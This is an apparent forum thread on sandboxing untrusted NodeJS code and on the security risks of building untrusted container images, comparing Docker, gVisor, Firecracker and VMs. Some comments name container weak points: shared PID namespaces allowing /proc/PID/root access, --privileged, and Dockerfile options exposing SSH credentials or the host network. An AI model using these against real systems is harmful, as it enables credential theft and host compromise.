Building untrusted container images safely at scale

Anyone have advise or links for how to dynamically run untrusted code in production? Specifically NodeJS.

It looks like the isolated-vm package is the go-to, but understandably it prevents things like fetch or being able to import packages.

I’m thinking to use docker and have a single base image that exposes an API that will take an arbitrary string, check for and install imports, then eval (eesh) the code, but before going down the road of implementing it myself and going crazy over properly securing the containers I’m thinking that there has got to be some prior art. How are Codesandbox et al doing it?

weitendorf a day ago

I recommend gvisor: https://gvisor.dev/
If you want to learn more about this subject the keyword you’re looking for is “multitenancy”
Docker’s container runtime is not really a safe way to run untrusted code. I don’t recommend relying on it.
Also, why would an isolated vm prevent fetch? You can give your users NAT addresses to let them make outbound network calls. I am putting the finishing touches on a remote IDE that does exactly that.
- yedidmh 10 hours ago
  
  I would give you a hundred upvotes if I could. This is a fantastic resource, looks perfect for what I want
s_ting765 a day ago

Keep docker. As long as you do not expose volumes back to the host system, it is reasonably safe (despite the misconceptions it comes with good security defaults).
If you want to further lock this down, there are many tools such as apparmor and seccomp that you can add custom profiles with but a good starting point would be:
docker run --security-opt no-new-privileges --cap-drop ALL untrusted-image
- yedidmh 10 hours ago
  
  Thanks!
pveierland a day ago

Depending on your criteria, a server like https://github.com/supabase/edge-runtime could be a fit.
yjftsjthsd-h a day ago

What is your threat model / what are you trying to stop from happening?
- yedidmh 10 hours ago
  
  I want to prevent attempts to example break out of the container into the parent system
neapolisbeach a day ago

Nsjail, firecracker, gVisor, or v8 isolates are all good options with different tradeoffs

CamouflagedKiwi a day ago

I'm a bit disappointed. I thought the article would have some discussion on how to actually build untrusted container images in a safe way, but it is really just about how to connect to the Depot API and have it do it for you. I imagine there must be something inside there that answers that part (from some of their other articles, maybe that's BuildKit? unsure).

adastra22 5 days ago

I'm confused--what's the security risk in building a container?

bilbo-b-baggins 2 days ago

Fundamentally building a container involves running a container - each layer is executed in turn as a temporary container.
The same risks that running an unknown container has - are had by building one.
For reference there have been quite a few CVEs related to container escape: https://www.paloaltonetworks.com/blog/cloud-security/leaky-v...
Telstrom90 5 days ago

You're running untrusted code. Every RUN command in a user's Dockerfile is executed during build, which means you're executing arbitrary commands from strangers on your own infrastructure. If you're not isolating that properly, it's a security risk.
- adastra22 5 days ago
  
  Inside the container though. The whole point of which is that it sandboxes and isolates the running code.
  
  dijit 2 days ago
  
  Containers in linux are primarily a shipping method (as Docker themselves try to inform you with the visual of a shipping container).
  Just like real shipping containers, dangerous things inside can leak out - the isolation is not foolproof by any means, in fact if someone has the express wish of violating the isolation boundary it's barely an inconvenience.
  
  vbezhenar a day ago
  
  I don't think that's the whole story. There's no documented way to escape the container. The kernel provides namespace isolation which should be foolproof by design. You might argue, that there were many bugs which allowed to escape the container and probably more bugs will be found in the future. However it does not mean, that it's fair to call it "inconvenience". I don't know any zero-day bugs in Linux and probably neither you. And it would take me a lot of effort to even attempt to find one.
  
  eyberg a day ago
  
  > should be foolproof by design.
  I think this is a core reason why containers have such a horrible security track record.
  They weren't made by design.
  One of the large problems is that there is no "create_container(2)". There are 8? different namespaces in conjunction with cgroups that make up "containers" and they are infinitely configurable. This is problematic and a core reason why we see container escapes almost every other month. Just look at user namespaces - some people use them and some people don't, but it was just a few months ago when multiple bypasses were published for them.
  
  PhilipRoman a day ago
  
  No company today will let you run your own code on their server if the only thing that's sandboxing it are containers. On the other hand, every VPS provider happily lets you do whatever you want inside their VM/hypervisor. This should tell you all you need to know about the security guarantees of Linux containers compared to hypervisors.
  
  nyrikki a day ago
  
  Namespaces are not a security feature, they are... namespaces.
  In k8s as an example, if you share your PID namespace in a pod, which is a simple config option, you can arbitrarily enter other pod member FS tree with /proc/PID/root, only protected by Unix permissions.
  Without seacomp, capabilities, SELinux etc... anyone who can launch a docker container can use the --privlaged flag and change host firmware or view any filesystem including the hosts root.
  Focusing on namespace breakout only misses most of the attack surface.
  
  elternal_love a day ago
  
  Linux kernel code has had many zero-days bugs and will continue to do so. Kernel programming is _incredibly_hard and unforgiving.
  
  RainyDayTmrw 2 days ago
  
  This blog post[1] explains why that is not a safe assumption.
  [1]: https://www.aquasec.com/blog/container-isolation/
  
  amluto 2 days ago
  
  Maybe the default form of RUN is kinda sorta safe [0].
  How about ADD? Or COPY? Or RUN —-mount=type=bind,rw…?
  Over the last ten years or so we’ve progressed from subtle-ish security holes due to memory unsafety and such to shiny tools in shiny safe languages that have absolutely gaping security and isolation holes by design. Go us.
  [0] There is some serious wishful thinking involved there.
  
  ptx a day ago
  
  > Or RUN —-mount=type=bind,rw…?
  This seems to be pretty safe, according to the docs, if I understand them correctly. A bind mount can only mount "context directories" and the rw option will discard the written data, it says.
  
  amluto a day ago
  
  No way, you're right, they actually tried to make it kind of sensible.
  Too bad there's also:
  Steal my credentials (temporarily, but still...) to access remote systems without restriction:
  RUN --mount=type=ssh
  Access TCP and UDP ports without restriction, including anything exported by any other container I'm running, because Docker has no real security model
  RUN --network=host
  Outright pwn me, but only if "entitiled":
  RUN --security=insecure
  
  dijksterhuis 2 days ago
  
  containers are not virtualization. they only provide lightweight isolation as they share the host kernel.
  so if you want sandboxing and proper isolation -- use a VM.
  https://learn.microsoft.com/en-us/virtualization/windowscont...
  
  nijave a day ago
  
  The network isn't usually isolated. It build file can arbitrarily switch to the root user
  There is some isolation but not complete isolation
lotharcable a day ago

Build environments are usually "soft targets" in most environments.
Especially ones that utilize a lot of the "CI/CD" pipeline approach.
Lots of secrets getting pulled from various different places, access to testing environments and testing databases needed for unit testing, access to systems that deploy to testing and prod environments. Sensitive code and secrets from multiple applications being used in the same servers and build infrastructure, etc.
So even if you trust containers to containerize securely (which is a bad idea in practice) there are all sorts of holes being poked in them to allow them integrate and access things. Even during building and testing.
Most security effort for most organizations involve hardening parts of production systems that are exposed to users and/or the internet. This not only involves proofing code and setting up firewalls, WAF, and such things, but also monitoring and whatnot.
That is expensive and a lot of work to do, while in build environments it tends to be more slapped together and people ignore them until something breaks.
You have similar situations with backup solutions. People need backups to secure data from corruption or deletion and protect businesses that way, but seeing them as a potential security hole isn't really thought about in the same way as running a production web server. Again it is something that just enough effort is put into to make sure it works and little attention is given to it unless it breaks.